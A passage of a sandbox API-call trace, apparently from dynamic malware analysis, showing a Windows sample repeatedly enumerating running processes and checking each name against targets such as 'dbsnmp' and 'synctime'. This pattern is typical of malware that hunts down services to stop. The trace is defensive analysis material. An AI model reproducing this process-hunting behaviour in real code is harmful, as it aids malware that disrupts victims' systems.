lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0093.052] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="dbsnmp") returned 0x0 [0093.052] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0093.052] CloseHandle (hObject=0x350) returned 1 [0093.053] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0093.073] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.075] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3567010 [0093.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3567010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0093.075] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0093.075] StrStrIA (lpFirst="[System Process]", lpSrch="synctime") returned 0x0 [0093.075] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0093.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0093.077] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x35477e8 [0093.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x35477e8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0093.077] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0093.077] StrStrIA (lpFirst="System", lpSrch="synctime") returned 0x0 [0093.077] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0093.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.078] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3567ae8 [0093.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3567ae8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0093.078] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0093.078] StrStrIA (lpFirst="smss.exe", lpSrch="synctime") returned 0x0 [0093.078] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.080] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3567cb0 [0093.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3567cb0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0093.080] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0093.080] StrStrIA (lpFirst="csrss.exe", lpSrch="synctime") returned 0x0 [0093.081] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0093.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.082] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567b18 [0093.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3567b18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0093.082] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0093.082] StrStrIA (lpFirst="wininit.exe", lpSrch="synctime") returned 0x0 [0093.083] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.084] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3567bc0 [0093.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3567bc0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0093.084] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0093.084] StrStrIA (lpFirst="csrss.exe", lpSrch="synctime") returned 0x0 [0093.084] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0093.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.085] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567cc8 [0093.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3567cc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0093.085] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0093.085] StrStrIA (lpFirst="winlogon.exe", lpSrch="synctime") returned 0x0 [0093.085] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0093.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.086] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567c50 [0093.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3567c50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0093.086] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0093.086] StrStrIA (lpFirst="services.exe", lpSrch="synctime") returned 0x0 [0093.086] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0093.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.088] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3567ce0 [0093.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3567ce0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0093.088] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0093.088] StrStrIA (lpFirst="lsass.exe", lpSrch="synctime") returned 0x0 [0093.088] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.089] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567c68 [0093.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567c68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.089] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.089] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.089] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0093.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.090] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3567bd8 [0093.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3567bd8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0093.090] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0093.090] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="synctime") returned 0x0 [0093.090] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0093.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.092] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3567bf0 [0093.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3567bf0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0093.092] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0093.092] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="synctime") returned 0x0 [0093.092] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.093] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567cf8 [0093.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567cf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.093] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.093] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.093] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0093.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0093.095] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547838 [0093.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3547838, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0093.095] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0093.095] StrStrIA (lpFirst="dwm.exe", lpSrch="synctime") returned 0x0 [0093.095] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x60, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.096] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567a40 [0093.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567a40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.096] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.096] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.097] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.098] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567a70 [0093.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567a70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.098] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.098] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.098] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.099] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567a88 [0093.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567a88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.099] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.099] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.099] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.101] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567d10 [0093.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567d10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.101] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.101] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.101] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.102] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567c38 [0093.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567c38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.102] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.102] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.102] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.103] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567b60 [0093.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567b60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.103] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.103] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.103] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.104] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567c20 [0093.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567c20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.104] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.104] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.104] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.105] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567b78 [0093.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567b78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.105] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.105] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.105] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.106] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567ab8 [0093.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567ab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 